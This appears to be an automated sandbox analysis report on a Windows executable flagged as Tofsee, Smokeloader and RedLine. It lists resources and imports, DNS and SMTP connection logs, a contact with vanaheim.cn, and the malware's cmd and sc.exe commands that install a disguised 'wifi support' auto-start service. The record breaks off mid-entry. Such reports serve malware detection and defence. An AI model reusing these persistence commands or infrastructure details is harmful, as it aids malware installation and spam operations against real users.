AFX_DIALOG_LAYOUT | 0x2075eb8 | 0xe | data | | | 1.5714285714285714
RT_CURSOR | 0x2075ec8 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706
RT_CURSOR | 0x20761f8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316
RT_CURSOR | 0x2076350 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.26439232409381663
RT_CURSOR | 0x20771f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.3686823104693141
RT_CURSOR | 0x2077aa0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.49060693641618497
RT_CURSOR | 0x2078038 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.27238805970149255
RT_CURSOR | 0x2078ee0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.375
RT_CURSOR | 0x2079788 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5057803468208093
RT_ICON | 0x206f640 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.4621535181236674
RT_ICON | 0x206f640 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.4621535181236674
RT_ICON | 0x20704e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.572202166064982
RT_ICON | 0x20704e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.572202166064982
RT_ICON | 0x2070d90 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.6336405529953917
RT_ICON | 0x2070d90 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.6336405529953917
RT_ICON | 0x2071458 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6936416184971098
RT_ICON | 0x2071458 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6936416184971098
RT_ICON | 0x20719c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.35383817427385894
RT_ICON | 0x20719c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.35383817427385894
RT_ICON | 0x2073f68 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Tamil | India | 0.4383208255159475
RT_ICON | 0x2073f68 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Tamil | Sri Lanka | 0.4383208255159475
RT_ICON | 0x2075010 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Tamil | India | 0.510655737704918
RT_ICON | 0x2075010 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Tamil | Sri Lanka | 0.510655737704918
RT_ICON | 0x2075998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.6081560283687943
RT_ICON | 0x2075998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.6081560283687943
RT_STRING | 0x2079f88 | 0x51a | data | Tamil | India | 0.44104134762633995
RT_STRING | 0x2079f88 | 0x51a | data | Tamil | Sri Lanka | 0.44104134762633995
RT_STRING | 0x207a4a8 | 0x582 | data | Tamil | India | 0.4390070921985816
RT_STRING | 0x207a4a8 | 0x582 | data | Tamil | Sri Lanka | 0.4390070921985816
RT_STRING | 0x207aa30 | 0x2d2 | data | Tamil | India | 0.48753462603878117
RT_STRING | 0x207aa30 | 0x2d2 | data | Tamil | Sri Lanka | 0.48753462603878117
RT_STRING | 0x207ad08 | 0x4b4 | data | Tamil | India | 0.4543189368770764
RT_STRING | 0x207ad08 | 0x4b4 | data | Tamil | Sri Lanka | 0.4543189368770764
RT_STRING | 0x207b1c0 | 0x28a | data | Tamil | India | 0.4907692307692308
RT_STRING | 0x207b1c0 | 0x28a | data | Tamil | Sri Lanka | 0.4907692307692308
RT_ACCELERATOR | 0x2075e78 | 0x40 | data | Tamil | India | 0.875
RT_ACCELERATOR | 0x2075e78 | 0x40 | data | Tamil | Sri Lanka | 0.875
RT_GROUP_CURSOR | 0x2076328 | 0x22 | data | | | 1.0294117647058822
RT_GROUP_CURSOR | 0x2078008 | 0x30 | data | | | 0.9375
RT_GROUP_CURSOR | 0x2079cf0 | 0x30 | data | | | 0.9375
RT_GROUP_ICON | 0x2075e00 | 0x76 | data | Tamil | India | 0.6610169491525424
RT_GROUP_ICON | 0x2075e00 | 0x76 | data | Tamil | Sri Lanka | 0.6610169491525424
RT_VERSION | 0x2079d20 | 0x264 | data | | | 0.5490196078431373
DLL | Import
KERNEL32.dll | GetCurrentProcess, SetDefaultCommConfigW, SetEnvironmentVariableW, CreateJobObjectW, UnlockFile, CreateHardLinkA, GetModuleHandleW, GetTickCount, FindNextVolumeMountPointA, GetNumberFormatA, GetWindowsDirectoryA, SetCommState, GlobalAlloc, SetFileShortNameW, LoadLibraryW, GetCalendarInfoA, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetFileAttributesW, VerifyVersionInfoA, GetModuleFileNameW, CreateActCtxA, GetThreadPriorityBoost, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, SetLastError, GetProcAddress, CreateNamedPipeA, GetConsoleDisplayMode, GetProcessVersion, InterlockedDecrement, InterlockedExchangeAdd, CreateFileMappingW, CreateEventW, OpenEventA, GlobalWire, EnumDateFormatsA, EnumResourceNamesA, VirtualProtect, GetCurrentDirectoryA, PeekConsoleInputA, GetShortPathNameW, SetProcessShutdownParameters, GetDiskFreeSpaceExA, ReadConsoleInputW, DebugBreak, GetTempPathA, EnumCalendarInfoExA, LocalFree, TlsFree, CommConfigDialogW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, HeapSize, EnumCalendarInfoW, GetLocaleInfoA, SetEndOfFile, GetConsoleAliasExesA, MultiByteToWideChar, HeapAlloc, GetLastError, HeapReAlloc, ExitProcess, DecodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapFree, IsProcessorFeaturePresent, WriteFile, GetStdHandle, HeapCreate, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, SetFilePointer, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeW, Sleep, RaiseException, SetStdHandle, RtlUnwind, CreateFileW
USER32.dll | GetMenuStringW, DrawStateA, LoadMenuW, GetWindowLongA, CharUpperW, GetSysColor, GetCaretPos, SetMenu
GDI32.dll | CreateDCW, GetBitmapBits, GetCharWidthFloatA, GetCharWidth32A
Language of compilation system | Country where language is spoken | Map
Tamil | India |
Tamil | Sri Lanka |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 7, 2024 15:14:55.493493080 CEST | 49705 | 25 | 192.168.2.5 | 52.101.42.0
Sep 7, 2024 15:14:56.500251055 CEST | 49705 | 25 | 192.168.2.5 | 52.101.42.0
Sep 7, 2024 15:14:58.515916109 CEST | 49705 | 25 | 192.168.2.5 | 52.101.42.0
Sep 7, 2024 15:14:58.574218988 CEST | 49706 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:14:58.574270010 CEST | 443 | 49706 | 77.232.41.29 | 192.168.2.5
Sep 7, 2024 15:14:58.574362993 CEST | 49706 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:15:02.515858889 CEST | 49705 | 25 | 192.168.2.5 | 52.101.42.0
Sep 7, 2024 15:15:10.531486988 CEST | 49705 | 25 | 192.168.2.5 | 52.101.42.0
Sep 7, 2024 15:15:15.502469063 CEST | 49712 | 25 | 192.168.2.5 | 67.195.204.74
Sep 7, 2024 15:15:16.515852928 CEST | 49712 | 25 | 192.168.2.5 | 67.195.204.74
Sep 7, 2024 15:15:18.515850067 CEST | 49712 | 25 | 192.168.2.5 | 67.195.204.74
Sep 7, 2024 15:15:22.515793085 CEST | 49712 | 25 | 192.168.2.5 | 67.195.204.74
Sep 7, 2024 15:15:30.515762091 CEST | 49712 | 25 | 192.168.2.5 | 67.195.204.74
Sep 7, 2024 15:15:35.532682896 CEST | 49713 | 25 | 192.168.2.5 | 64.233.166.26
Sep 7, 2024 15:15:36.546994925 CEST | 49713 | 25 | 192.168.2.5 | 64.233.166.26
Sep 7, 2024 15:15:38.547022104 CEST | 49713 | 25 | 192.168.2.5 | 64.233.166.26
Sep 7, 2024 15:15:38.562834024 CEST | 49706 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:15:38.562897921 CEST | 443 | 49706 | 77.232.41.29 | 192.168.2.5
Sep 7, 2024 15:15:38.562975883 CEST | 49706 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:15:38.673190117 CEST | 49714 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:15:38.673239946 CEST | 443 | 49714 | 77.232.41.29 | 192.168.2.5
Sep 7, 2024 15:15:38.673321962 CEST | 49714 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:15:42.547060013 CEST | 49713 | 25 | 192.168.2.5 | 64.233.166.26
Sep 7, 2024 15:15:50.546967983 CEST | 49713 | 25 | 192.168.2.5 | 64.233.166.26
Sep 7, 2024 15:15:55.549953938 CEST | 49716 | 25 | 192.168.2.5 | 217.69.139.150
Sep 7, 2024 15:15:56.562762976 CEST | 49716 | 25 | 192.168.2.5 | 217.69.139.150
Sep 7, 2024 15:15:58.578284979 CEST | 49716 | 25 | 192.168.2.5 | 217.69.139.150
Sep 7, 2024 15:16:02.593909025 CEST | 49716 | 25 | 192.168.2.5 | 217.69.139.150
Sep 7, 2024 15:16:10.593833923 CEST | 49716 | 25 | 192.168.2.5 | 217.69.139.150
Sep 7, 2024 15:16:18.672368050 CEST | 49714 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:16:18.672439098 CEST | 443 | 49714 | 77.232.41.29 | 192.168.2.5
Sep 7, 2024 15:16:18.672523022 CEST | 49714 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:16:18.782577038 CEST | 49717 | 443 | 192.168.2.5 | 77.232.41.29
Sep 7, 2024 15:16:18.782610893 CEST | 443 | 49717 | 77.232.41.29 | 192.168.2.5
Sep 7, 2024 15:16:18.782674074 CEST | 49717 | 443 | 192.168.2.5 | 77.232.41.29
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 7, 2024 15:14:55.461682081 CEST | 54319 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:14:55.492765903 CEST | 53 | 54319 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:14:58.395411015 CEST | 57731 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:14:58.573323011 CEST | 53 | 57731 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:15:15.485579967 CEST | 62772 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:15:15.493833065 CEST | 53 | 62772 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:15:15.494482040 CEST | 63508 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:15:15.501846075 CEST | 53 | 63508 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:15:35.516355991 CEST | 62353 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:15:35.523921967 CEST | 53 | 62353 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:15:35.524554968 CEST | 53732 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:15:35.532021999 CEST | 53 | 53732 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:15:55.531979084 CEST | 51429 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:15:55.539191961 CEST | 53 | 51429 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:15:55.539833069 CEST | 55641 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:15:55.549460888 CEST | 53 | 55641 | 1.1.1.1 | 192.168.2.5
Sep 7, 2024 15:16:57.386473894 CEST | 55072 | 53 | 192.168.2.5 | 1.1.1.1
Sep 7, 2024 15:16:57.395345926 CEST | 53 | 55072 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 7, 2024 15:14:55.461682081 CEST | 192.168.2.5 | 1.1.1.1 | 0x9b6e | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:14:58.395411015 CEST | 192.168.2.5 | 1.1.1.1 | 0x15f6 | Standard query (0) | vanaheim.cn | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.485579967 CEST | 192.168.2.5 | 1.1.1.1 | 0x767 | Standard query (0) | yahoo.com | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:15.494482040 CEST | 192.168.2.5 | 1.1.1.1 | 0xf1c7 | Standard query (0) | mta7.am0.yahoodns.net | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:35.516355991 CEST | 192.168.2.5 | 1.1.1.1 | 0x9c37 | Standard query (0) | google.com | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:35.524554968 CEST | 192.168.2.5 | 1.1.1.1 | 0x669 | Standard query (0) | smtp.google.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:55.531979084 CEST | 192.168.2.5 | 1.1.1.1 | 0xda1e | Standard query (0) | mail.ru | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:55.539833069 CEST | 192.168.2.5 | 1.1.1.1 | 0xf5fc | Standard query (0) | mxs.mail.ru | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:16:57.386473894 CEST | 192.168.2.5 | 1.1.1.1 | 0xaf64 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 7, 2024 15:14:55.492765903 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b6e | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.42.0 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:14:55.492765903 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b6e | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.11.0 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:14:55.492765903 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b6e | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.40.26 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:14:55.492765903 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b6e | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.8.49 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:14:58.573323011 CEST | 1.1.1.1 | 192.168.2.5 | 0x15f6 | No error (0) | vanaheim.cn | | 77.232.41.29 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.493833065 CEST | 1.1.1.1 | 192.168.2.5 | 0x767 | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:15.493833065 CEST | 1.1.1.1 | 192.168.2.5 | 0x767 | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:15.493833065 CEST | 1.1.1.1 | 192.168.2.5 | 0x767 | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 67.195.204.74 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 67.195.228.94 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 98.136.96.74 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 98.136.96.75 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 67.195.204.73 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 98.136.96.76 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 67.195.204.77 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:15.501846075 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1c7 | No error (0) | mta7.am0.yahoodns.net | | 67.195.204.79 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:35.523921967 CEST | 1.1.1.1 | 192.168.2.5 | 0x9c37 | No error (0) | google.com | | | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:35.532021999 CEST | 1.1.1.1 | 192.168.2.5 | 0x669 | No error (0) | smtp.google.com | | 64.233.166.26 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:35.532021999 CEST | 1.1.1.1 | 192.168.2.5 | 0x669 | No error (0) | smtp.google.com | | 74.125.133.26 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:35.532021999 CEST | 1.1.1.1 | 192.168.2.5 | 0x669 | No error (0) | smtp.google.com | | 74.125.71.27 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:35.532021999 CEST | 1.1.1.1 | 192.168.2.5 | 0x669 | No error (0) | smtp.google.com | | 64.233.166.27 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:35.532021999 CEST | 1.1.1.1 | 192.168.2.5 | 0x669 | No error (0) | smtp.google.com | | 74.125.71.26 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:55.539191961 CEST | 1.1.1.1 | 192.168.2.5 | 0xda1e | No error (0) | mail.ru | | | MX (Mail exchange) | IN (0x0001) | false
Sep 7, 2024 15:15:55.549460888 CEST | 1.1.1.1 | 192.168.2.5 | 0xf5fc | No error (0) | mxs.mail.ru | | 217.69.139.150 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:15:55.549460888 CEST | 1.1.1.1 | 192.168.2.5 | 0xf5fc | No error (0) | mxs.mail.ru | | 94.100.180.31 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:16:57.395345926 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf64 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.11.0 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:16:57.395345926 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf64 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.40.26 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:16:57.395345926 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf64 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.42.0 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 15:16:57.395345926 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf64 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.8.49 | A (IP address) | IN (0x0001) | false


                                                                                      Target ID:0
                                                                                      Start time:09:14:49
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Users\user\Desktop\874A7cigvX.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\874A7cigvX.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:409'088 bytes
                                                                                      MD5 hash:F7AE445081E10267D2CEC9B6B0E2D375
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:09:14:50
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:09:14:50
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                      Imagebase:0x380000
                                                                                      File size:61'440 bytes
                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:09:14:51
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection"
                                                                                      Imagebase:0x380000
                                                                                      File size:61'440 bytes
                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\sc.exe" start ycgeofkw
                                                                                      Imagebase:0x380000
                                                                                      File size:61'440 bytes
                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:09:14:52
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:09:14:53
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:11'205'632 bytes
                                                                                      MD5 hash:702317DA74C3C1D30ED61EA3A7D7DFCD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
